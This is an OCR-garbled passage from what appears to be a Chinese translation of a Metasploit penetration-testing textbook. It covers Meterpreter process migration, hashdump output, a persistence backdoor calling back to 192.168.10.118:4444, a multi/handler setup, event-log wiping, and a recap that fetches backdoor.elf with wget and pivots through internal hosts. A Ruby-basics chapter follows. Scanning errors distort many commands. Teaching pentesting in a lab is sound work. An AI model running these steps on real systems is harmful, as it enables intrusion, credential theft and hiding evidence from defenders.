748 464 svchost.exe x64 0 NT AUTHORITYALOCAL SERVICE C:\Windows\System32\svchost.exe 
788 464 svchost.exe x64 0 NT AUTHORITYASYSTEM C:\Windows\System32\svchost.exe 
832 464 svchost.exe x64 0 NT AUTHORITYXALOCAL SERVICE C:\Windows\System32\svchost.exe 
908 464  svchost.exe x64 0 NT AUTHORITYANETWORK SERVICE C:\Windows\System32\svchost.exe 
1044 464  svchost.exe x64 0 NT AUTHORITYASYSTEM C:\Windows\System32\svchost.exe 
1084 464  svchost.exe x64 0 NT AUTHORITYASYSTEM C:\Windows\System32\svchost.exe 
1104 464  svchost.exe x64 0 NT AUTHORITYASYSTEM C:\Windows\System32\svchost.exe 
1380 464  svchost.exe x64 0 NT AUTHORITYANETWORK SERVICE C:\Windows\System32\svchost.exe 
1688 1820 ServerManager.exe x64 1 WIN-3KOU2TIJ4EOV Administrator C:\Windows\System32\ServerManager.exe 
1760 2208 wscript.exe x86 1 WIN-3KOU2TIJ4EOV Administrator C:\Windows\SysWOW64\wscript.exe 
1792 788  taskhostex.exe x64 1 WIN-3KOU2TIJ4EOV Administrator C:\Windows\System32\taskhostex.exe 
1864 1808 explorer.exe x64 1 WIN-3KOU2TIJ4EOV Administrator C:\Windows\explorer.exe 
2036 1760 eIJDRPTHQ.exe x86 1 WIN-3KOU2TIJ4EOV Administrator C:\Users\ADMINI~1\AppData\Local\Temp\radE1801. tm 
pXeIJDRPTHQ.exe 
2096 1864 VBoxTray.exe x64 1 WIN-3KOU2TIJ4EOV Administrator C:\Windows\System32\VBoxTray.exe 
2152 1864 KMFtp.exe x86 1 WIN-3KOU2TIJ4EOVAdministrator C:\Program Files (x86)VKONICA MINOLTAVFTP Utilit 
yMKMFtp.exe 
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当前 Meterpreter 驻 留 的 进程 号 为 2036， 对 应 EE exe。 如 果 一 个 管理 员 结 束 

这 个 程序 ， 我 们 的 Meterpreter 会 话 就 会 被 停止 。 因 此 ， 我 们 需要 将 它 驻 留 到 一 个 更 合适 的 进程 
上 ， 这 样 才能 躲 过 管理 员 的 眼睛 。 ww 我 们 来 将 Meterpreter 迁 
移 到 它 上 面 。 它 是 一 个 基于 Windows 操 作 系 统 的 主要 进程 ， 如 下 图 所 示 。 


meterpreter > migrate 1864 

[*] Migrating from 2036 to 1864... 
[*] Migration completed successfully. 
meterpreter » getpid 

Current pid: 1864 


程 迁移 成 功 之 后 , 输入 getpid 命 令 查 看 Meterpreter 所 依附 的 进程 ， 如 上 图 所 示 。 可 以 使 用 
hashdump 命 令 收集 被 渗透 系统 上 密码 的 哈 希 值 ， 这 个 过 程 如 下 图 所 示 。 


meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee : 01c714f171b670ce8f 719f2d07812470: : : 
Guest:501:aad3b435b51404eeaad3b435b51404ee : 31d6cfe0d16ae931b73c59d7e0c089c0: : : 

imm: 1001: aad3b435b51404eeaad3b435b51404ee : d2f 717a89953203539f 48f a076a11584: : : 
meterpreter » 


完成 了 哈 希 值 的 收集 之 后 ， 就 可 以 执行 pass-the-hash 攻 击 ， 在 没有 明文 密码 的 情况 下 绕 过 
限制 。 


有 关 Windows 操 作 系 统 漏 洞 的 更 多 信息 ， 请 访问 http:/www.cvedetails.comy 


vendor/26/Microsoft.html 
(D 也 可 以 访问 http://www.cvedetails.com/top-5-vendors.php?year= 来 获取 关于 世 
界 50 大 软件 提供 商 的 漏洞 信息 。 


1.45 ”渗透 访问 控制 的 持久 化 


当成 功 渗透 进入 目标 计算 机 以 后 , 可 能 还 需要 反复 地 对 其 进行 访问 控制 。 那么 如 何 能 保持 对 
目标 计算 机 的 控制 连接 就 变 得 十 分 重要 了 。 为 了 实现 这 一 点 , 可 以 选择 在 目标 计算 机 上 添加 一 个 
新 的 用 户 ， 也 可 以 选择 使 用 Metasploit 中 的 persistence 模 块 。 


运行 persistence 模 块 可 以 通过 在 目标 计算 机 上 安装 一 个 永久 性 的 后 门 来 实现 访问 控制 的 
持久 化 。 这样， 即使 有 一 天 目标 计算 机 修补 了 漏洞 ,我 们 仍然 可 以 通过 这 个 连接 来 实现 对 目标 计 
算 机 的 控制 。 执 行 的 命令 和 执行 后 的 效果 如 下 面 的 屏幕 截图 所 示 。 


meterpreter > run persistence 
[*] Running Persistance Script 
[*] Resource file for cleanup created at /root/.msf5/logs/persistence/WIN-3KOU2TI.4EO 20160322.2110/WIN-3KOU2TIJ4EO 20160322.2 
110.rc 
[*] Creating Payload-windows/meterpreter/reverse tcp LHOST-192.168.10.118 LPORT-4444 
[*] Persistent agent script is 148412 bytes long 
Persistent Script written to C:\Users\ADMINI~1\AppData\Local\Temp\CUvIFuzPv . vbs 
[*] Executing script C:\Users\ADMINI~1\AppData\Local\Temp\CUvIFuzPv . vbs 
Agent executed with PID 2060 
meterpreter > B 
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运行 persistence 模 块 将 会 向 目标 计算 机 上 传 一 个 .vbs 类 型 的 恶意 脚本 文件 , 并 在 目标 计算 
机 上 执行 这 个 恶意 脚本 文件 。 这 个 脚本 文件 一 旦 在 目标 计算 机 上 运行 , 每 隔 几 秒 钟 就 会 主动 去 连 
接 攻击 考 的 计算 机 。 这 个 恶意 脚本 文件 会 被 当 作 一 个 系统 服务 安装 在 目标 计算 机 系统 中 , 同时 会 
被 添加 到 开机 启动 项 中 。 因 此 , 无 论 目标 计算 机 重新 启动 多 少 次 ,该 恶意 服务 都 可 以 运行 。 除 非 
种 载 该 服务 或 者 手动 删除 文件 ， 否 则 恶意 服务 的 效果 将 一 直 存 在 。 


为 了 连接 到 目标 计算 机 上 的 恶意 服务 并 能 重新 开始 访问 , 我 们 需要 建立 一 个 渗透 handler 来 对 
连接 进行 管理 。exploit/multi/handler 是 一 个 通用 的 渗透 handler， 主 要 用 来 管理 目标 计算 机 上 运行 
的 攻击 载荷 与 攻击 者 计算 机 之 间 的 连接 。 我 们 在 Metasploit 的 终端 中 输入 命令 来 运行 这 个 handler。 
执行 的 命令 和 执行 后 的 效果 如 下 面 的 屏幕 截图 所 示 。 


msf > use exploit/multi/handler 

msf exploit(handler) > set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tc 

msf exploit(handler) » set LHOST 192.168.10.118 

LHOST z» 192.168.10.118 

msf exploit(handler) » set LPORT 4444 

LPORT z» 4444 

msf exploit(handler) > exploitli 


此 处 的 一 个 关键 点 是 ,我 们 设置 的 攻击 载荷 和 LPORT 选 项 必须 与 运行 persistence 模 块 时 设 
置 的 攻击 载荷 和 LPORT 选 项 相同 。 


发 出 攻击 命令 sxploit 后 ，exploiymultyhandler 开 始 等 待 从 目标 系统 上 发 回来 的 连接 。 一 旦 
传人 的 连接 被 检测 到 ， 控 制 终端 就 会 切换 到 Meterpreter 命 令 行 。 


qp 这 里 推荐 一 份 关于 如 何在 Meterpreter 后 门 中 使 用 metsvc 的 资料 : https://www. 


offensive-security.com/metasploit-unleashed/meterpreter-backdoor/ 。 


1.16 “清除 渗透 痕迹 


在 成 功 完成 一 次 对 目标 系统 的 渗透 测试 之 后 ， 最 好 将 入 侵 过 程 中 留 下 的 所 有 痕迹 都 清除 掉 。 
不 过 如 果 是 获得 了 许可 的 渗透 测试 ,建议 你 不 要 清除 系统 日 志和 入 侵 痕 迹 , 这 样 蓝 队 就 可 以 利用 
这 些 日 志 改 善 其 防御 ,同时 知晓 渗透 测试 工程 师 是 如 何 进入 系统 的 。 因 此 ， 只 有 后 门 程序 或 者 可 
执行 文件 应 该 被 删除 。 不 过 , 我 们 也 必须 学 习 如 何 消除 痕迹 。 为 了 实现 这 个 目的 ,我们 需要 通过 
事件 管理 器 模块 清除 事件 日 志 。 


meterpreter > run event manager -i 
[*] Retriving Event Log Configuration 


Event Logs on System 


==================== I 


Name Retention Maximum Size Records 
Application Disabled 20971520K 887 
HardwareEvents Disabled 20971520K 0 
Internet Explorer Disabled K 0 

Key Management Service Disabled 20971520K 0 
Security Disabled 20971520K 1746 


System Disabled 20971520K 1223 
Windows PowerShell Disabled 15728640K 86 
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在 这 里 可 以 看 到 大 量 的 系统 日 志 。 我 们 用 参数 -c 来 删除 它们 。 E 


meterpreter » run event manager -c 

[-] You must specify and eventlog to query! 
[*] Application: 

Clearing Application 

Event Log Application Cleared! 
HardwareEvents: 

Clearing HardwareEvents 

Event Log HardwareEvents Cleared! 
Internet Explorer: 

Clearing Internet Explorer 

Event Log Internet Explorer Cleared! 
Key Management Service: 

Clearing Key Management Service 

Event Log Key Management Service Cleared! 
Security: 

Clearing Security 

Event Log Security Cleared! 

System: 

Clearing System 

Event Log System Cleared! 


我 们 已 经 完成 了 对 目标 网 络 环境 的 一 次 渗透 测试 ， 接 下 来 可 以 继续 生成 此 次 渗透 测试 的 报 
告 。 在 前 面 的 测试 中 ,我 们 以 学 所 以 将 重点 都 放 在 了 一 个 漏洞 上 。 但 是 在 实际 工 
作 中 ， 必 须 对 目标 系统 进行 全 面 的 漏洞 测试 ， 以 验证 目标 系统 中 所 有 的 潜在 漏洞 。 


也 可 以 在 Meterpreter 命 令 行 中 输入 clearv 命 令 清除 目标 系统 的 事件 日 志 。 


1.17 ”回顾 入 侵 过 程 


现在 来 总 结 一 下 整个 渗透 测试 的 过 程 。 

(1) 在 最 开始 的 时 候 ， 使 用 NMAP 对 目标 进行 一 次 扫描 。 

(2) 发 现 目 标 计 算 机 的 21 端 口上 运行 着 VSFTPD 2.3.4， 这 款 软件 存在 漏洞 。 
(3) 对 运行 在 21 端 口 的 VSFTPD 2.3.4 进 行 了 渗透 攻击 。 

(4) 在 IP 地 址 为 192.168.10.112 的 目标 上 获得 了 一 个 shell 权 限 。 


3. VSFTPD Exploit + CMD 
UNIX SHELL 


8.Linux Meterpreter 权 限 


9. msf> arp. 


192.168.10.118 192.168.10.112 


5. Wget A 
nttp://192.168.10.11 
8/backdoor.elf 


4. 命 令 行 shell 权 限 


6. chmod TU 7 .Jbackdoor.elf 


backdoor.elf 


40 第 1 章 走 近 Metasploit 渗 透 测 试 框架 


(5) 创建 一 个 Linux 使 用 的 Meterpreter shell, ， 并 将 其 复制 到 Apache 下 的 /varwww 目 录 中 。 接 下 
来 ， 在 shell 中 运行 wget 命 令 ， 将 最 新 创建 的 Meterpreter shell 传 送 到 目标 计算 机 中 。 


(6) 通过 命令 chmod 777 backdoor .elf 为 shell 后 门 文件 赋予 完全 权限 。 


(7) 在 一 个 单独 的 终端 中 建立 一 个 渗透 模块 handler， 这 个 handler 将 运行 在 4444 端 口上 ， 然 后 
在 日 标 计算 机 上 运行 backdoor.elf 文 件 。 


(8) 获得 了 IP 地 址 为 192.168.10.112 目 标 系统 的 Linux Meterpreter 权 限 。 


(9) 在 已 经 成 功 渗透 的 目标 系统 上 运行 arp 命 令 。 发 现 这 个 系统 还 连接 到 了 一 个 独立 的 内 部 网 
络 ， 并 且 已 经 和 一 个 内 网 IP 地 址 为 192.168.20.4 的 主机 建立 了 连接 。 


(10) 利用 Meterpreter shell 在 192.168.10.112 上 快速 建立 一 个 去 往 192.168.20.0/24 网 络 的 autoroute 
(自动 路 由 模块 )。 


(11) 通过 Meterpreter 转 发 所 有 的 流量 ， 对 目标 执行 一 次 TCP 类 型 的 端口 扫描 和 服务 认证 。 


10. 在 192.168.20.0 。 11.TCP 喘 口 扫描 。 ]3.pHp 渗 透 模块 


- op * 
的 自动 路 由 模块 45. Upload + CHM 
EXECUTE on 
backdoor.elf 


8. Linux Meterpreter 权 限 


192.168.10.118 192.168.10.112 
192.168.20.5 


14.PHP Meterpreter 权 限 


utbs 行 有 
y. E ipis 


16.Linux Meterpreter 权 限 


192.168.20.4 


(12) 发 现 目标 在 80 端 口上 运行 着 一 个 有 漏洞 版 本 的 PHP 服 务 器 。 

(13) 通过 PHP CGI 参数 注入 漏洞 实现 了 对 目标 系统 的 渗透 。 

(14) 获取 了 位 于 网 络 内 部 的 主机 ( 192.168.20.4 ) 的 控制 权限 , 这 个 控制 由 PHP Meterpreter 实 现 。 
(15) 接 下 来 向 目标 上 传 并 执行 backdoor.elf 文 件 ， 这 与 之 前 在 第 一 个 系统 中 所 做 的 一 样 。 
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(16) 获取 了 目标 系统 的 Linux Meterpreter 权 限 。 NM 
(17) 在 目标 系统 上 运行 arp 命 令 ， 查 找 网 络 上 是 否 存在 其 他 主机 。 
(18) 在 网 络 上 发 现 了 IP 地 址 为 192.168.20.6 的 主机 ， 并 对 其 进行 一 次 TCP 类 型 的 端口 扫描 。 


(19) 对 所 有 端口 进行 扫描 。 在 目标 的 8080 端 口上 发 现 了 正在 运行 的 HFS 2.3， 而 且 这 个 软件 
上 存在 着 远程 命令 执行 漏洞 。 


(20) 利用 Metasploit 中 的 HFS 渗 透 模 块 实现 了 对 目标 系统 的 渗透 。 


(21) 获得 目标 系统 的 Windows Meterpreter 权 限 。 
Q2) 运行 一 个 持久 化 模块 ， 保 持 对 目标 的 访问 权限 。 


Q3) 每 隔 几 秒 钟 ， 持 和 久 化 模块 就 会 尝试 连接 我 们 的 系统 。 这 样 当 handler 建 立 好 之 后 ， 就 可 以 
立刻 打开 Meterpreter 权 限 。 


(24) 利用 Meterpreter 中 的 event_manager 模 块 清除 日 志 。 


1.18 小 结 


本 章 介 绍 了 渗透 测试 的 各 个 阶段 ， 讲 解 了 Metasploit 的 安装 过 程 以 及 如 何 对 指定 网 络 开 展 黑 
盒 测 试 ， 回 顾 了 Metasploit 的 基本 功能 和 用 法 ， 展 示 了 如 何 对 两 个 不 同 的 Linux 系 统 和 Windows 
Server 2012 系 统 进行 渗透 测试 ， 同 时 还 讲解 了 在 Metasploit 中 使 用 数据 库 的 优势 。 

在 本 章 结束 之 际 ， 我 们 已 经 掌握 了 以 下 内 容 。 

a 关于 渗透 测试 各 阶段 的 理论 

口 在 Metasploit 中 使 用 数据 库 的 好 处 

口 Metasploit 测 试 框架 的 基础 知识 
口 渗透 模块 和 辅助 模块 的 工作 原理 
口 使 用 Metasploit 进 行 渗透 测试 的 相关 理论 

本 章 的 主要 目的 是 介绍 渗透 测试 的 各 个 阶段 和 Metasploit 框 架 ， 为 后 续 章 节 的 学 习 做 准备 。 


下 一 章 将 介绍 一 种 看 起 来 有 些 困 难 的 技术 ， 那 就 是 编程 实现 Metasploit 的 组 件 。 我 们 将 深入 
研究 Metasploit 的 编码 部 分 并 编写 Metasploit 框 架 的 自 定 义 功 能 。 


打造 定制 化 的 Metasploit 
渗透 测试 框架 


“人 生 最 难能可贵 的 是 ， 当 所 有 人 都 劝 你 甘于 平庸 时 ， 你 却 勇 于 坚持 自我 。” 
一 一 出 处 不 详 


在 回顾 完 Metasploit 基 本 功能 的 用 法 之 后 ， 下 面 开始 学 习 Metasploit 模 块 的 编写 。 首 先是 Ruby 
编程 语言 的 基础 知识 ,然后 是 Ruby 的 各 种 语法 和 语义 ,通过 这 一 章 的 学 习 , 你 将 轻松 掌握 Metasploit 
模块 的 编写 要 领 。 本 章 将 会 讲解 如 何 设计 和 制作 各 种 自 定义 Metasploit 模 块 ， 以 及 如 何 创 建 自 定义 
的 后 渗透 模块 ， 这 将 有 助 于 我 们 更 好 地 控制 已 成 功 渗透 的 目标 主机 系统 。 


设想 这 样 一 种 情况 : 我 们 要 开展 渗透 测试 的 目标 系统 数量 非常 多 , 并 且 还 需要 在 成 功 渗透 之 
后 进行 后 渗透 测试 工作 , 例如 从 所 有 的 目标 主机 系统 上 下 载 一 个 指定 的 文件 。 从 每 个 目标 系统 手 
动 下 载 指定 文件 将 会 花费 大 量 的 时 间 和 精力 。 因 此 , 在 这 种 情形 下 可 以 编写 一 个 自 定义 的 后 渗透 
模块 脚本 。 这 个 脚本 会 自动 从 所 有 被 渗透 了 的 目标 系统 中 下 载 指定 文件 。 


本 章 首 先 介 绍 在 Metasploit 环 境 中 Ruby 编 程 的 相关 知识 ,然后 讲解 如 何 开发 各 种 Metasploit 模 块 。 
本 章 着 眼 于 以 下 这 几 个 要 点 。 


口 了 解 在 Metasploit 环 境 中 进行 Ruby 编 程 的 基础 知识 。 

口 研究 Metasploit 的 模块 。 

口 编写 自 定义 的 扫描 模块 、 暴 力 破 解 模块 和 后 渗透 模块 。 
口 编写 Meterpreter 脚 本 。 

口 理解 Metasploit 模 块 的 语法 和 语义 。 

口 通过 RailGun 使 用 DLL 完成 十 分 困难 的 任务 。 


现在 让 我 们 开始 了 解 Ruby 编 程 语 言 的 基础 ， 并 积累 与 Metasploit 模 块 编写 相关 的 知识 。 


在 深入 研究 Metasploit 模 块 的 编写 之 前 ， 必 须 了 解 编写 这 些 模块 所 必需 的 Ruby 编 程 语言 的 核心 
特性 。 为 什么 学 习 Metasploit 时 要 掌握 的 语言 是 Ruby 呢 ? 下 面 几 点 将 帮助 我 们 揭示 这 个 问题 的 答案 。 
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口 可 以 构建 自动 化 类 来 重用 代码 是 Ruby 语 言 的 一 个 特点 ， 而 这 个 特点 正好 满足 了 Metasploit 
的 需求 。 

O Ruby 是 一 种 面向 对 象 的 编程 语言 。 

口 Ruby 是 一 种 解释 型 语言 ， 执 行 速度 快 ， 项 目 开 发 周期 短 。 


2.1 Ruby——Metasploit 的 核心 


Ruby 编 程 语言 可 以 说 是 Metasploit 征 架 的 核心 。 不 过 Ruby 到 底 是 什么 呢 ?” 根 据 Ruby 官 方 网 站 的 
说 法 ，Ruby 是 一 种 简单 而 强大 的 编程 语言 。 日 本 的 松本 行 弘 在 1995 年 设计 并 实现 了 Ruby 语 言 。™ 
后 来 它 被 进一步 定义 为 功能 类 似 于 Perl 语 言 的 、 具 有 动态 特性 和 反射 机 制 的 、 通 用 的 面向 对 象 
(Object-Oriented Programming, OOP) 的 程序 设计 语言 。 


可 以 从 http:/Rubyinstaller.org/downloads/ 下 载 Windows/Linux 版 本 的 Ruby。 
也 可 以 通过 下 面 的 网 页 获得 优秀 的 Ruby 学 习 资 源 : http://ryruby.org/levels/1/challenges/。 


2.1.1 创建 你 的 第 一 个 Ruby 程序 


Ruby 是 一 种 十 分 简单 易学 的 编程 语言 。 首 先 了 解 一 下 Ruby 语 言 的 基础 知识 。 但 是 请 记 住 ， 
Ruby 是 一 种 内 容 十 分 丰富 的 编程 语言 。 如 果 讲 解 Ruby 的 所 有 知识 将 会 远 远 超出 本 书 的 范围 ， 
此 我 们 将 只 涉及 编写 Metasploit 模 块 所 必需 的 Ruby 知 识 。 


1. Ruby 的 交互 式 命令 行 


Ruby 语 言 提 供 了 一 个 可 以 进行 交互 的 命令 行 。 在 交互 式 命令 行 上 进行 工作 可 以 使 我 们 更 清楚 
地 理解 Ruby 的 基础 知识 。 好 的 ， 现 在 就 要 开始 了 。 首 先 打 开 你 的 CMD 命 令 行 或 者 终端 窗口 ， 然 
后 在 其 中 输入 命令 irp 来 启动 Ruby 的 交互 式 命令 行 。 

先 在 Ruby 交 互 式 命令 行 中 输入 一 些 内 容 , 然后 查看 发 生 的 变化 ; 假设 如 下 图 所 示 输 入 数字 2: 


irb(main):001:0> 2 
2» 2 


交互 式 命令 行 返回 并 输出 了 刚刚 输入 的 值 。 现 在 , 来 进行 男 一 个 操作 , 例如 一 个 如 下 图 所 示 
的 加 法 运算 : 


irb(main):002:0> 2+3 
2» 5 


可 以 看 到 ， 如 果 输 入 的 内 容 是 一 个 表达 式 的 话 ， 交 互 式 命令 行 会 返回 并 输出 表达 式 的 结果 。 


OD 详细 掌握 Ruby 语 言 ， 可 参考 由 Ruby 之 父 松 本 行 弘 亲自 审 校 的 《Ruby 基 础 教程 〈 第 5 版 )》( 人 民 邮 电 出 版 社 2017 年 
8 月 出 版 )。 编者 注 
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现在 来 执行 一 些 对 字符 串 的 操作 , 例如 将 一 个 字符 串 类 型 的 值 保存 到 一 个 变量 中 。 过程 如 下 
所 示 : 


irb(main):005:0» a= "nipun" 

=> "nipun" 

irb(main):006:0» b= "loves Metasploit" 
=> "loves metasploit" 


当 对 变量 as 和 赋值 结束 后 ， 我 们 来 查看 一 下 当 在 交互 式 命令 行 中 输入 a 和 a+b 时 ， 交 互 式 合 
令 行 是 如 何 反 应 的 : 

irb(main):014:0> a 

=> "nipun" 


irb(main):015:0» a+b 
=> "nipun loves metasploit" 


可 以 看 到 ， 当 将 a 作 为 一 个 输入 时 ， 交 互 式 命令 行 返回 并 输出 了 它 保存 的 名 为 a 的 变量 的 值 。 
类 似 地 ， 输 入 a+b 返 回 并 输出 的 结果 为 变量 a 和 b 的 连接 。 

2. 在 命令 行 中 定义 方法 

方法 或 者 函数 是 一 组 语句 , 当 我 们 调用 它们 时 会 开始 执行 。 可 以 简单 地 在 Ruby 交 互 命令 行 中 
声明 一 个 方法 ， 也 可 以 在 脚本 中 对 它们 进行 声明 。 在 使 用 Metasploit 模 块 时 ，Ruby 的 方法 是 一 个 
很 重要 的 部 分 。 来 看 看 它 的 语法 格式 : 


def method name [( [arg [= default]]...[, * arg [, &expr ]])] 


expr 
end 
要 定义 一 个 方法 ， 首 先 以 aef 开 始 ， 紧 随 其 后 的 是 方法 的 名 称 ， 然 后 是 包含 在 括号 中 的 参 


数 和 表达 式 。 我 们 还 将 一 个 eng 声 明 放 在 所 有 表达 式 的 最 后 来 结束 对 方法 的 定义 。 这 里 ，arg 
指 的 是 方法 所 接收 的 参数 ，expr 指 的 是 方法 用 来 接受 并 计算 的 表达 式 。 来 看 一 个 例子 : 
irb(main):002:0» def xorops(a,b) 
irb(main):003:1» res = a ^ b 
irb(main):004:1» return res 


irb(main):005:1» end 
=> :XOrops 


我 们 定义 了 一 个 名 为 xorops 的 方法 ， 它 接收 a 和 ?两 个 参数 。 接 着 将 接收 到 的 参数 进行 异 
或 运算 ， 并 将 结果 保存 到 一 个 名 为 res 的 新 变量 o 最 后 使 用 return 语 名 来 返回 结果 。 


irb(main):006:0» xorops(90,147) 
=> 201 


可 以 看 到 ,函数 通 过 异 或 运算 打印 出 了 正确 的 结果 。Ruby 语 言 提供 了 puts 和 print 这 两 种 输 
出 打印 函数 。 当 涉及 Metasploit 框 架 时 ， 将 使 用 print_1ine 函 数 。 我 们 可 以 分 别 使 用 print_good、 
print_status 和 print_error 语 句 来 表示 成 功 执行 、 状 态 和 错误 。 下 面 给 出 了 具体 的 示例 : 
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print good("Example of Print Good") 
print status("Example of Print Status") 
print error("Example of Print Error") 


当 你 在 Metasploit 模 块 下 运行 这 些 命令 时 会 产生 如 下 输出 ，+ 符 号 并 绿色 显示 表示 正常 ，* 符 
号 并 蓝 色 显示 表示 状态 信息 ，- 符 号 并 红色 显示 表示 错误 信息 。 


[+] Example of Print Good 
[*] Example of Print Status 
[-] Example of Print Error 


我 们 将 会 在 本 但 的 后 半 部 分 学 习 各 种 类 型 的 输出 语句 的 作用 。 


2.1.2. Ruby 中 的 变量 和 数据 类 型 


是 指 一 个 值 随时 可 以 改变 的 占 位 符 。 在 Ruby 中 , 我 们 只 有 在 需要 使 用 一 个 变量 的 时 候 才 
对 其 进行 声明 。Ruby 语 言 支持 数目 众多 的 变量 数据 类 型 ， 但 是 我 们 只 讨论 与 Metasploit 相 关 的 数 
型 。 下 面 来 看 看 这 些 数据 类 型 以 及 它们 的 操作 。 

1. 字符 串 的 处 理 

字符 串 是 表示 一 个 流 或 字符 序列 的 对 象 。 在 Ruby 中 , 可 以 像 上 一 个 例子 中 那样 轻松 地 将 一 个 
字符 串 类 型 的 值 赋 给 一 个 变量 。 通过 简单 地 使 用 双 引 号 或 者 单 引号 标记 一 个 值 , 就 可 以 将 这 个 值 
定义 为 字符 串 。 


这 里 推荐 尽量 使 用 双 引 号 标记 ， 因 为 单 引号 标记 可 能 会 引发 问题 。 看 一 下 可 能 引发 的 问题 : 


1, 
分 里 


irb(main):005:0» name = 'Msf Book' 
=> "Msf Book" 
irb(main):006:0» name = 'Msf's Book' 


irb(main):007:0' ' 


可 以 看 到 ， 当 使 用 一 对 单 括号 标记 时 ， 它 们 工作 了 。 然 而 当 试 图 使 用 sf ' s 代 替 Msf 时 ， 错 
误 却 出 现 了 。 这 是 因为 在 程序 执行 时 ， 系 统 误 将 Msf's 中 的 单 引 号 当成 了 字符 串 结束 的 单 引 号 ， 
这 显然 并 非 我 们 所 愿 。 而 这 种 情况 导致 程序 出 现 了 语法 错误 。 


1) 字符 串 连 接 


在 使 用 Metasploit 模 块 的 时 候 ， 会 用 到 字符 串 连 接 功能 一 一 我 们 有 好 几 个 实例 都 需要 将 两 个 
不 同 的 结果 连接 成 一 个 字符 串 。 可 以 使 用 + 运算 符 来 实现 字符 串 链 接 ; 另外 ， 当 需要 在 一 个 变量 
后 面 追加 数据 的 时 候 ， 也 可 以 使 用 << 运 算 符 : 

irb(main):007:0» a = "Nipun" 

=> "Nipun" 


irb(main):008:0» a «« " loves" 
=> "Nipun loves" 


46 第 2 章 ”打造 定制 化 的 Metasploit 渗透 测试 框架 


irb(main):009:0> a << " Metasploit" 

=> "Nipun loves Metasploit" 

irb(main):010:0> a 

=> "Nipun loves Metasploit" 

irb(main):011:0» b = " and plays counter strike" 

=> " and plays counter strike" 

irb(main):012:0» a+b 

=> "Nipun loves Metasploit and plays counter strike" 


这 里 先 将 "Nipun" 赋 值 给 变量 a， 然 后 再 使 用 << 运 算 符 在 它 的 后 面 追 加 了 "1oves'" 和 


"Metasploit"s 使 用 另 一 个 变量 b 保 存 了 值 "anda plays counter strike", TÆ, 简单 
地 使 用 + 运算 符 将 这 两 个 变量 连接 起 来 ,得 到 了 一 个 完整 的 输出 "Nipun loves Metasploit and 


plays counter strike", 


2) 子 字符 串 (substring) 函数 
在 Ruby 中 可 以 轻松 地 使 用 substring 函 数 来 获取 子 字 符 串 只 需要 指明 子 字符 串 在 字符 


串 中 的 起 始 位 置 和 长 度 ， 就 可 以 获得 它 ， 如 下 所 示 : 


HS 


这 一 


irb(main):001:0» a- "12345678" 
=> "12345678" 

irb(main):002:0» a[0,2] 

=> "12" 

irb(main):003:0» a[2,2] 

=> "34" 


3) split 函数 


可 以 使 用 split 函 数 将 一 个 字符 串 类 型 的 值 分 割 为 一 个 变量 数组 ,用 一 个 简单 的 例子 来 说 明 


J 


irb(main):001:0» a = "mastering,metasploit" 
=> "mastering,metasploit" 

irb(main):002:0> b = a.split(",") 

=> ["mastering", "metasploit"] 
irb(main):003:0» b[0] 

-» "mastering" 

irb(main):004:0» b[1] 

=> "metasploit" 


可 以 看 到 ， 现 在 已 经 将 字符 串 转 换 成 了 一 个 新 的 数组 b。 这 个 数组 b 中 包含 了 b[01 和 pf1] 两 


个 元 素 ， 分别 是 "mastering" 和 "metasploit"。 


2. Ruby 中 的 数字 和 转换 
我 们 可 以 直接 在 算术 运算 中 使 用 数字 。 在 处 理 用 户 的 输入 时 ， 可 以 用 ko_i 函 数 将 字符 串 类 


型 的 输入 转换 成 数字 。 男 一 方面 ， 也 可 以 使 用 to_s 函 数 将 一 个 数字 转换 成 字符 串 。 


来 看 一 个 简单 的 例子 以 及 它 的 输出 : 
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irb(main):006:0» bz"55" 
=> "55" 
irb(main):007:0» b+10 
TypeError: no implicit conversion of Fixnum into String 
from (irb):7:in `+' 
from (irb):7 
from C:/Ruby200/bin/irb:12:in `<main>' 
irb(main):008:0» b.to i410 


=> 65 

irb(main):009:0» a-10 

-» 10 

irb(main):010:0» bz"hello" 
=> "hello" 


irb(main):011:0» a+b 

TypeError: String can't be coerced into Fixnum 

from (irb):11:in `+' 
from (irb):11 
from C:/Ruby200/bin/irb:12:in `<main>' 

irb(main):012:0» a.to s«b 

=> "10hello" 

可 以 看 到 ， 当 将 一 个 用 引号 标记 的 值 赋 给 变量 bp 时 ， 这 个 变量 会 被 当 作 一 个 字符 串 处 理 。 当 
使 用 这 个 变量 进行 加 法 运算 时 就 会 出 现 错误 。 但 是 ， 对 其 使 用 了 to_ 关 函数 以 后 ， 这 个 变量 就 会 
从 字符 串 类 型 转换 成 整 型 ， 从 而 可 以 正常 地 执行 加 法 运算 。 同 样 ， 对 于 字符 串 ， 当 我 们 试图 将 一 
个 整数 和 一 个 字符 串 连 接 到 一 起 时 , 错误 就 出 现 了 。 不 过 , 当 进行 了 类 型 转换 后 , 一 切 就 正常 了 。 


e Ruby 中 的 数 制 转换 


在 使 用 渗透 模块 和 其 他 模块 时 , 都 将 使 用 到 各 种 转换 机 制 。 现在 来 看 一 些 之 后 会 用 到 的 数 各 
转换 。 


口 16 进 制 到 10 进 制 的 转换 


c 


ERuby Fit Hine PASOS — AARE TA Eh 8] 037 fil B e ds F2) 8] ER, P TE h 


了 一 个 示例 : 
irb(main):021:0» a= "10" 
二 > "10" 

irb(main):022:0» a.hex 
-» 16 


可 以 看 出 ，16 进 制 下 的 10 对 应 10 进 制 下 的 16。 
口 10 进 制 到 16 进 制 的 转换 
和 上 例 中 相反 的 操作 可 以 使 用 ko_s 函 数 来 实现 : 


irb(main):028:0» 16.to s(16) 
二 > "10" 
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3. Ruby 中 的 范围 


范围 (range) 是 一 个 很 重要 的 内 容 ， 广 泛 应 用 在 Metasploit 的 辅助 模块 中 ， 例 如 扫描 模块 和 
测试 模块 。 


让 我 们 定义 一 个 范围 ， 并 且 查 看 一 下 可 以 对 这 种 数据 类 型 进行 哪些 操作 : 


irb(main):028:0» zero to nine- 0..9 

z» 0..9 

irb(main):031:0» zero to nine.include? (4) 
=> true 

irb(main):032:0» zero to nine.include?(11) 
-» false 

irb(main):002:0» zero to nine.eachí(lzero to nine| print(zero to nine)) 
0123456789-» 0..9 

irb(main):003:0» zero to nine.min 

=> 0 

irb(main):004:0» zero to nine.max 

=> 9 


我 们 可 以 看 到 一 个 范围 对 象 提 供 的 多 种 操作 , 例如 搜索 、 查 找 最 小 值 和 最 大 值 和 显示 范围 中 
的 所 有 数据 。 这 里 的 includqe? 郴 数 可 以 检查 范围 中 是 否 包 含 某 一 个 特定 的 值 。 此 外 ，min 和 max 
